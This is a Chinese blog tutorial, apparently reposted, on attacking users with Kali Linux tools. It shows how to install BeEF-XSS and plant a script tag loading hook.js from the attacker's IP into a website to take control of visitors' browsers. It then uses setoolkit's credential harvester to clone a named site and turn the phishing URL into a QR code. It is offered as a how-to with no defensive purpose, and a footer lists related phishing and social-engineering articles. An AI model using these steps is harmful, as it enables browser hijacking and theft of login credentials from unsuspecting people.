本文转自行云博客https://www.xy586.top

beef-xss

安装beef-xss:apt install beef-xss
安装完成之后运行beef-xss:

登录网址:http://192.168.232.138:3000/ui/authentication

将beef-xss生成的js代码,放入网站中
<script src="http://192.168.232.138:3000/hook.js"></script>
被攻击目标打开网页链接,则beef中得到该电脑控制

setoolkit:

kali自带setoolkit,终端直接输入setoolkit运行
选择1

接着选择2,web攻击:

选择3)credential harvester attack method:

选择2)site cloner:

IP默认,克隆网站:http://www.51bb0.cn

登录IP,克隆成功

还可使用setoolkit将网页URL生成二维码,
选择8)QRCode Generator Attack Vectors:

输入网址:www.51bbO.cn生成二维码

在/root/.set/reports文件夹下,将生成的二维码导出:
sz qrcode_attack.png

网站克隆:setoolkit社工软件相关推荐

  1. 犯罪分子社工GoDaddy 员工,获得密币相关网站域名的控制权

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 提要 犯罪分子利用社工,欺骗 GoDaddy 员工,劫持了多个密币相关网站的流量和邮件. 黑客使用社工技术,更改了受害者域名的 DNS ...

  2. 社工利器--setoolkit之钓鱼攻击

    该文章仅供参考学习,切勿用于非法用途 简介 社会工程学(Social Engineering)认为人为因素才是安全的软肋.很多企业.公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生 ...

  3. 社工工具包 SEToolkit

    社会工程学(Social Engineering)简称社工,其通过分析攻击对象的心理弱点,利用人性的本能反应,以及任何好奇心,贪婪等心理特征进行的,使用诸如假冒,欺骗,引诱等多种手段来达成攻击目标的一 ...

  4. 最新社工库在线查询网站

    社工查询网站 手机号注册网站查询 信用查询 国内企业信息 政府信息查询 身份信息查询 驾驶员及车辆信息查询 物品资产查询 物流查询 发票查询 金融查询 手机信息查询 个人信息查询 搜索引擎 手机号注册 ...

  5. 社工库365开网站公开售卖盗取的账号信息

    如今网上盗号猖獗,个人信息泄露严重. 社工库365开网站公开售卖盗取的账号信息,我测试了下,的确可以查询到密码信息.包括很早以前注册的账号,163.126都沦陷了,密码的md5值都暴露出来了. 过了2 ...

  6. access制作封装软件_用Access开发《社工服务管理系统》

    2018年初结缘盟威软件,了解其Access快速开发平台,特别惊喜,这不就是自己一直想要苦苦寻觅的平台吗?但那时候刚毕业工作,对于工作业务流程不是特别的了解,没有进一步深入了解,而且需要代码,所以只能 ...

  7. Ip探针_信息探针_社工查询个人信息php网站源码

    介绍: Ip探针_信息探针_社工查询个人信息php网站源码 他可以查IP 精确位置 然后社工地址的话更准 需要的东西: 服务器或主机一部 2.浏览器搜索 二级域名分发 很多免费的 3.绑定域名 4.上 ...

  8. 简单的钓鱼网站制作-Setoolkit

    Setoolki这个工具在kali自带,github地址:https://github.com/trustedsec/social-engineer-toolkit git clone https:/ ...

  9. 渗透测试与攻防对抗-信息收集与社工技巧

    文章目录 信息收集与社工技巧 1.信息收集总览 2.信息收集-DNS 3.信息收集-子域名收集 4.信息收集-C段扫描 5.信息收集-Web目录扫描 6.信息收集-指纹识别 7.Google Hack ...

  10. 信息收集——网站克隆和钓鱼邮件

    普及网站克隆方法和邮件伪造原理和方法 网站克隆 复制目标网站前端信息 构建相似网页 获取用户登录数据 方法 cotaltstrike能够快速复制目标网站前端页面,并且复制相识度极高 cotaltstr ...

最新文章

  1. python xml字符串和dict字典互转
  2. 埃及冒险java_我的世界1.7.10亚图姆探险整合包
  3. mysql镜像远程连接_Docker创建MySQL镜像并成功进行远程连接
  4. MvcScaffold快速开发实例
  5. Hive:表1inner join表2结果group by优化
  6. PostgreSQL 荣获 2019 年 O'Reilly 终身成就奖
  7. 第一次正面交火!版主说博文里有广告!
  8. php取json子对象属性,PHP json获取相关对象值
  9. ssis 包部署_如何使用各种选项从SSIS目录执行已部署的程序包
  10. 网页设计中时尚​​的下拉菜单案例
  11. 配置kafka Server
  12. HDU2003 求绝对值【入门】
  13. 关于RDP报表工具参数配置
  14. jQuery中id包含特殊字符,以及包含变量时处理。
  15. 解决vscode打开txt文件乱码
  16. JS一些常用证件信息的正则表达式
  17. SAP系统用户账号类型介绍
  18. 威斯康星麦迪逊计算机科学专业,威斯康星大学麦迪逊分校计算机科学专业申请条件汇总...
  19. 最简单DIY基于STM32单片机的蓝牙智能小车设计方案
  20. 加强版Apktool堪称逆向神器

热门文章

  1. linux基于i2c-tools快速搭建设备读写环境
  2. 昼夜双色导航主题模板 WordPress导航模板
  3. 2022年6月25日PMP考试通关宝典-4
  4. 数据结构与算法(C语言版)——陈越
  5. gaot工具箱介绍及应用
  6. php cas 票据认证失败,解决CAS客户端验证ST票据时发生的TicketValidationException问题...
  7. python怎么看自己安装的第三方包_安装第三方包查看python版本/第三方包版本
  8. github 思维导图开元软件_最强大脑!这 7 款开源思维导图工具真的很神奇
  9. 软考资料合集/软考真题合集(软件设计师/网络工程师/系统分析师/系统架构师/软件测评师/程序员等)
  10. 聚合影视大全android版,聚合影视App下载-聚合影视大全2021最新版 1.5.0 安卓版-我游网...